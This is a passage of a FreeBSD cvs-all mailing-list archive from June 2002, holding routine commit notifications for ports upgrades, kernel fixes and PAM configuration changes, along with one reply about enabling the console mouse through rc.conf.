Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mike 2002/06/19 12:05:41 PDT Modified files: sys/sys un.h Log: Change spelling of `u_char' to `unsigned char' to avoid requiring as a prerequisite. Revision Changes Path 1.24 +1 -1 src/sys/sys/un.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 12:21:57 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 65E1B37B40E; Wed, 19 Jun 2002 12:21:54 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JJLsF74540; Wed, 19 Jun 2002 12:21:54 -0700 (PDT) (envelope-from pat) Message-Id: <200206191921.g5JJLsF74540@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 12:21:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/Mk bsd.sites.mk X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 12:21:54 PDT Modified files: Mk bsd.sites.mk Log: Directory structure slightly changed in 2 of the GNU mirrors PR: ports/39533 Submitted by: Jason Harris Revision Changes Path 1.91 +3 -3 ports/Mk/bsd.sites.mk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 12:22:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D516637B406; Wed, 19 Jun 2002 12:22:18 -0700 (PDT) Received: (from eivind@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JJMIM74624; Wed, 19 Jun 2002 12:22:18 -0700 (PDT) (envelope-from eivind) Message-Id: <200206191922.g5JJMIM74624@freefall.freebsd.org> From: Eivind Eklund Date: Wed, 19 Jun 2002 12:22:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/locate/locate updatedb.sh X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG eivind 2002/06/19 12:22:18 PDT Modified files: usr.bin/locate/locate updatedb.sh Log: Make locate.updatedb tell about the security risk when it is run as root. Revision Changes Path 1.18 +6 -1 src/usr.bin/locate/locate/updatedb.sh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 12:25:15 2002 Delivered-To: cvs-all@freebsd.org Received: from van-laarhoven.org (ap-z-5ab8.adsl.wanadoo.nl [212.129.218.184]) by hub.freebsd.org (Postfix) with SMTP id 08ED037B406 for ; Wed, 19 Jun 2002 12:25:07 -0700 (PDT) Received: (qmail 6856 invoked from network); 19 Jun 2002 19:25:05 -0000 Received: from heather.van-laarhoven.org (10.66.0.2) by uitsmijter.van-laarhoven.org with SMTP; 19 Jun 2002 19:25:05 -0000 Date: Wed, 19 Jun 2002 21:25:05 +0200 (CEST) From: Nick Hibma To: Doug Barton Cc: "cvs-committers@FreeBSD.org" , "cvs-all@FreeBSD.org" Subject: Re: cvs commit: src/etc usbd.conf In-Reply-To: <200206180750.g5I7oJV55088@freefall.freebsd.org> Message-ID: <20020619212311.J228-100000@heather.van-laarhoven.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Um, the following works just fine. In /etc/rc.conf add something along the lines of: allscreens_flags="-m on" No need for vidcontrol -m on to be called after the mouse has been attached to. Nick P.S.: I noticed the message in current but too late. On Tue, 18 Jun 2002, Doug Barton wrote: > dougb 2002/06/18 00:50:19 PDT > > Modified files: > etc usbd.conf > Log: > Do vidcontrol -m on after starting moused for a usb mouse. > > PR: conf/39125 > Submitted by: Mike Makonnen > Not objected to by: -current and -hackers > > Revision Changes Path > 1.11 +2 -2 src/etc/usbd.conf > > http://www.freebsd.org/cgi/cvsweb.cgi/src/etc/usbd.conf?r1=1.10&r2=1.11&cvsroot=freebsd > -- n_hibma@van-laarhoven.org http://www.van-laarhoven.org/ n_hibma@FreeBSD.org http://www.etla.net/~n_hibma/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 12:34:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F170E37B40C; Wed, 19 Jun 2002 12:34:35 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JJYZN75857; Wed, 19 Jun 2002 12:34:35 -0700 (PDT) (envelope-from dillon) Message-Id: <200206191934.g5JJYZN75857@freefall.freebsd.org> From: Matt Dillon Date: Wed, 19 Jun 2002 12:34:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils/cpdup Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/19 12:34:35 PDT Modified files: sysutils/cpdup Makefile distinfo Log: Update cpdup to version 1.04, which fixes a memory corruption bug in RemoveRecur() and adds an option, -s0, which allows cpdup to replace a destination directory with a file. Also correct a portlint -act warning. Revision Changes Path 1.6 +3 -3 ports/sysutils/cpdup/Makefile 1.3 +1 -1 ports/sysutils/cpdup/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 12:39:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C268F37B411; Wed, 19 Jun 2002 12:39:32 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JJdWH76366; Wed, 19 Jun 2002 12:39:32 -0700 (PDT) (envelope-from marcus) Message-Id: <200206191939.g5JJdWH76366@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 12:39:32 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/databases/libgda2 Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 12:39:32 PDT Modified files: databases/libgda2 Makefile Log: Adding missing dependency on popt. Revision Changes Path 1.21 +2 -1 ports/databases/libgda2/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 12:52: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6F50B37B406; Wed, 19 Jun 2002 12:52:00 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JJq0182928; Wed, 19 Jun 2002 12:52:00 -0700 (PDT) (envelope-from marcus) Message-Id: <200206191952.g5JJq0182928@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 12:52:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-fm/gnome-commander Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 12:52:00 PDT Modified files: x11-fm/gnome-commander Makefile Log: Add USE_REINPLACE. Revision Changes Path 1.3 +1 -0 ports/x11-fm/gnome-commander/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 12:58:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C694E37B404; Wed, 19 Jun 2002 12:58:11 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JJwBs83350; Wed, 19 Jun 2002 12:58:11 -0700 (PDT) (envelope-from marcus) Message-Id: <200206191958.g5JJwBs83350@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 12:58:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/guile Makefile pkg-plist ports/lang/guile/files patch-configure patch-guile-readline_configure X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 12:58:11 PDT Modified files: lang/guile Makefile pkg-plist Added files: lang/guile/files patch-configure patch-guile-readline_configure Log: * Don't install .la files * Don't install libltdl.* * Dump PORTREVISION Revision Changes Path 1.31 +4 -1 ports/lang/guile/Makefile 1.1 +10 -0 ports/lang/guile/files/patch-configure (new) 1.1 +10 -0 ports/lang/guile/files/patch-guile-readline_configure (new) 1.13 +0 -3 ports/lang/guile/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13: 0:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BB8A837B404; Wed, 19 Jun 2002 13:00:44 -0700 (PDT) Received: (from des@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JK0ix84026; Wed, 19 Jun 2002 13:00:44 -0700 (PDT) (envelope-from des) Message-Id: <200206192000.g5JK0ix84026@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: Wed, 19 Jun 2002 13:00:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc/pam.d sshd telnetd X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG des 2002/06/19 13:00:44 PDT Modified files: etc/pam.d sshd telnetd Log: Enable OPIE for sshd and telnetd. I thought I'd done this a long time ago... Sponsored by: DARPA, NAI Labs Revision Changes Path 1.7 +3 -1 src/etc/pam.d/sshd 1.3 +2 -0 src/etc/pam.d/telnetd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13: 1:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E29C37B411; Wed, 19 Jun 2002 13:01:25 -0700 (PDT) Received: (from des@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JK1PM84095; Wed, 19 Jun 2002 13:01:25 -0700 (PDT) (envelope-from des) Message-Id: <200206192001.g5JK1PM84095@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: Wed, 19 Jun 2002 13:01:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc/pam.d Makefile csshd X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG des 2002/06/19 13:01:25 PDT Modified files: etc/pam.d Makefile Removed files: etc/pam.d csshd Log: We don't use this any more. Sponsored by: DARPA, NAI Labs Revision Changes Path 1.7 +2 -2 src/etc/pam.d/Makefile 1.4 +0 -9 src/etc/pam.d/csshd (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13: 4:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B636E37B40F; Wed, 19 Jun 2002 13:04:42 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JK4g384444; Wed, 19 Jun 2002 13:04:42 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206192004.g5JK4g384444@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 13:04:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 13:04:42 PDT Modified files: . modules Log: ssed --> ports/editors/ssed Revision Changes Path 1.5389 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13: 4:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EF5EF37B40D; Wed, 19 Jun 2002 13:04:40 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JK4eC84413; Wed, 19 Jun 2002 13:04:40 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206192004.g5JK4eC84413@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 13:04:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/editors Makefile ports/editors/ssed Makefile distinfo pkg-comment pkg-descr pkg-plist ports/editors/ssed/files patch-Makefile.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 13:04:40 PDT Modified files: editors Makefile Added files: editors/ssed Makefile distinfo pkg-comment pkg-descr pkg-plist editors/ssed/files patch-Makefile.in Log: add ssed 3.58 Super-sed is a heavily enhanced version of sed PR: 39156 Submitted by: Amar Takhar Revision Changes Path 1.202 +1 -0 ports/editors/Makefile 1.1 +23 -0 ports/editors/ssed/Makefile (new) 1.1 +1 -0 ports/editors/ssed/distinfo (new) 1.1 +11 -0 ports/editors/ssed/files/patch-Makefile.in (new) 1.1 +1 -0 ports/editors/ssed/pkg-comment (new) 1.1 +15 -0 ports/editors/ssed/pkg-descr (new) 1.1 +10 -0 ports/editors/ssed/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13: 5:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0A65B37B413; Wed, 19 Jun 2002 13:05:25 -0700 (PDT) Received: (from olgeni@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JK5Oc85452; Wed, 19 Jun 2002 13:05:24 -0700 (PDT) (envelope-from olgeni) Message-Id: <200206192005.g5JK5Oc85452@freefall.freebsd.org> From: Jimmy Olgeni Date: Wed, 19 Jun 2002 13:05:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel Makefile ports/devel/adacurses Makefile distinfo pkg-comment pkg-descr pkg-plist ports/devel/adacurses/files adacurses-config X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG olgeni 2002/06/19 13:05:24 PDT Modified files: devel Makefile Added files: devel/adacurses Makefile distinfo pkg-comment pkg-descr pkg-plist devel/adacurses/files adacurses-config Log: Add devel/adacurses, ncurses bindings for the Ada language (lang/gnat). Revision Changes Path 1.852 +1 -0 ports/devel/Makefile 1.1 +37 -0 ports/devel/adacurses/Makefile (new) 1.1 +1 -0 ports/devel/adacurses/distinfo (new) 1.1 +32 -0 ports/devel/adacurses/files/adacurses-config (new) 1.1 +1 -0 ports/devel/adacurses/pkg-comment (new) 1.1 +1 -0 ports/devel/adacurses/pkg-descr (new) 1.1 +98 -0 ports/devel/adacurses/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13: 6: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8073337B415; Wed, 19 Jun 2002 13:05:31 -0700 (PDT) Received: (from olgeni@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JK5VM85659; Wed, 19 Jun 2002 13:05:31 -0700 (PDT) (envelope-from olgeni) Message-Id: <200206192005.g5JK5VM85659@freefall.freebsd.org> From: Jimmy Olgeni Date: Wed, 19 Jun 2002 13:05:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG olgeni 2002/06/19 13:05:31 PDT Modified files: . modules Log: adacurses --> ports/devel/adacurses Revision Changes Path 1.5390 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:10:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 834BC37B40B; Wed, 19 Jun 2002 13:10:38 -0700 (PDT) Received: (from jeh@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JKAcb89733; Wed, 19 Jun 2002 13:10:38 -0700 (PDT) (envelope-from jeh) Message-Id: <200206192010.g5JKAcb89733@freefall.freebsd.org> From: "James E. Housley" Date: Wed, 19 Jun 2002 13:10:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/uvscan-dat Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jeh 2002/06/19 13:10:38 PDT Modified files: security/uvscan-dat Makefile distinfo Log: Upgrade to 4208 Revision Changes Path 1.102 +1 -1 ports/security/uvscan-dat/Makefile 1.100 +1 -1 ports/security/uvscan-dat/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:11:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0A80037B405; Wed, 19 Jun 2002 13:11:44 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JKBiN89899; Wed, 19 Jun 2002 13:11:44 -0700 (PDT) (envelope-from dwcjr) Message-Id: <200206192011.g5JKBiN89899@freefall.freebsd.org> From: "David W. Chapman Jr." Date: Wed, 19 Jun 2002 13:11:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/samba Makefile distinfo ports/net/samba/files patch-ba X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dwcjr 2002/06/19 13:11:43 PDT Modified files: net/samba Makefile distinfo net/samba/files patch-ba Log: Update to 2.2.5 Revision Changes Path 1.90 +4 -6 ports/net/samba/Makefile 1.38 +1 -1 ports/net/samba/distinfo 1.9 +4 -4 ports/net/samba/files/patch-ba To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:21:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 20A7337B404; Wed, 19 Jun 2002 13:21:22 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JKLMF91151; Wed, 19 Jun 2002 13:21:22 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206192021.g5JKLMF91151@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 13:21:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/netpbm Makefile distinfo pkg-plist ports/graphics/netpbm/files Makefile.config.FreeBSD manpages patch-GNUmakefile patch-Makefile.common patch-aj patch-ap patch-ay patch-ba patch-bb patch-bd patch-be patch-bf patch-bg patch-bi ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 13:21:21 PDT Modified files: graphics/netpbm Makefile distinfo pkg-plist graphics/netpbm/files Makefile.config.FreeBSD Added files: graphics/netpbm/files patch-GNUmakefile patch-Makefile.common patch-converter::other::pnmtopalm::Makefile patch-converter::other::pnmtopng.c patch-converter::other::pnmtotiffcmyk.c patch-converter::ppm::ppmtompeg::Makefile patch-lib::Makefile patch-other::pnmarith.c patch-pm_config.h Removed files: graphics/netpbm/files manpages patch-aj patch-ap patch-ay patch-ba patch-bb patch-bd patch-be patch-bf patch-bg patch-bi patch-co patch-cp Log: upgrade to 10.2 PR: 39482 Submitted by: Ports Fury Revision Changes Path 1.58 +7 -10 ports/graphics/netpbm/Makefile 1.29 +1 -1 ports/graphics/netpbm/distinfo 1.10 +9 -22 ports/graphics/netpbm/files/Makefile.config.FreeBSD 1.18 +0 -244 ports/graphics/netpbm/files/manpages (dead) 1.1 +11 -0 ports/graphics/netpbm/files/patch-GNUmakefile (new) 1.1 +16 -0 ports/graphics/netpbm/files/patch-Makefile.common (new) 1.10 +0 -35 ports/graphics/netpbm/files/patch-aj (dead) 1.2 +0 -15 ports/graphics/netpbm/files/patch-ap (dead) 1.4 +0 -15 ports/graphics/netpbm/files/patch-ay (dead) 1.12 +0 -25 ports/graphics/netpbm/files/patch-ba (dead) 1.20 +0 -113 ports/graphics/netpbm/files/patch-bb (dead) 1.18 +0 -19 ports/graphics/netpbm/files/patch-bd (dead) 1.15 +0 -19 ports/graphics/netpbm/files/patch-be (dead) 1.21 +0 -38 ports/graphics/netpbm/files/patch-bf (dead) 1.20 +0 -27 ports/graphics/netpbm/files/patch-bg (dead) 1.2 +0 -13 ports/graphics/netpbm/files/patch-bi (dead) 1.2 +0 -11 ports/graphics/netpbm/files/patch-co (dead) 1.1 +22 -0 ports/graphics/netpbm/files/patch-converter::other::pnmtopalm::Makefile (new) 1.1 +16 -0 ports/graphics/netpbm/files/patch-converter::other::pnmtopng.c (new) 1.1 +15 -0 ports/graphics/netpbm/files/patch-converter::other::pnmtotiffcmyk.c (new) 1.1 +23 -0 ports/graphics/netpbm/files/patch-converter::ppm::ppmtompeg::Makefile (new) 1.4 +0 -16 ports/graphics/netpbm/files/patch-cp (dead) 1.1 +103 -0 ports/graphics/netpbm/files/patch-lib::Makefile (new) 1.1 +15 -0 ports/graphics/netpbm/files/patch-other::pnmarith.c (new) 1.1 +35 -0 ports/graphics/netpbm/files/patch-pm_config.h (new) 1.36 +23 -18 ports/graphics/netpbm/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:44:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3A83E37B400; Wed, 19 Jun 2002 13:44:49 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JKinQ94061; Wed, 19 Jun 2002 13:44:49 -0700 (PDT) (envelope-from robert) Message-Id: <200206192044.g5JKinQ94061@freefall.freebsd.org> From: Robert Drehmel Date: Wed, 19 Jun 2002 13:44:49 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/cam/scsi scsi_sa.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG robert 2002/06/19 13:44:49 PDT Modified files: sys/cam/scsi scsi_sa.c Log: Correct spelling of 'supplied'. PR: misc/39528 Revision Changes Path 1.82 +2 -2 src/sys/cam/scsi/scsi_sa.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:47:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EAE5E37B40D; Wed, 19 Jun 2002 13:47:18 -0700 (PDT) Received: (from jeff@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JKlI394377; Wed, 19 Jun 2002 13:47:18 -0700 (PDT) (envelope-from jeff) Message-Id: <200206192047.g5JKlI394377@freefall.freebsd.org> From: Jeff Roberson Date: Wed, 19 Jun 2002 13:47:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_kern.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jeff 2002/06/19 13:47:18 PDT Modified files: sys/vm vm_kern.c Log: Teach kmem_malloc about M_ZERO. Revision Changes Path 1.79 +10 -4 src/sys/vm/vm_kern.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:47:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9BBDF37B40D; Wed, 19 Jun 2002 13:47:31 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JKlVC94416; Wed, 19 Jun 2002 13:47:31 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206192047.g5JKlVC94416@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 13:47:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/tpg Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 13:47:31 PDT Modified files: devel/tpg Makefile distinfo pkg-plist Log: upgrade to 2.0.1 Revision Changes Path 1.3 +9 -2 ports/devel/tpg/Makefile 1.3 +1 -1 ports/devel/tpg/distinfo 1.2 +13 -0 ports/devel/tpg/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:49:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AA26137B407; Wed, 19 Jun 2002 13:49:44 -0700 (PDT) Received: (from jeff@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JKnis94769; Wed, 19 Jun 2002 13:49:44 -0700 (PDT) (envelope-from jeff) 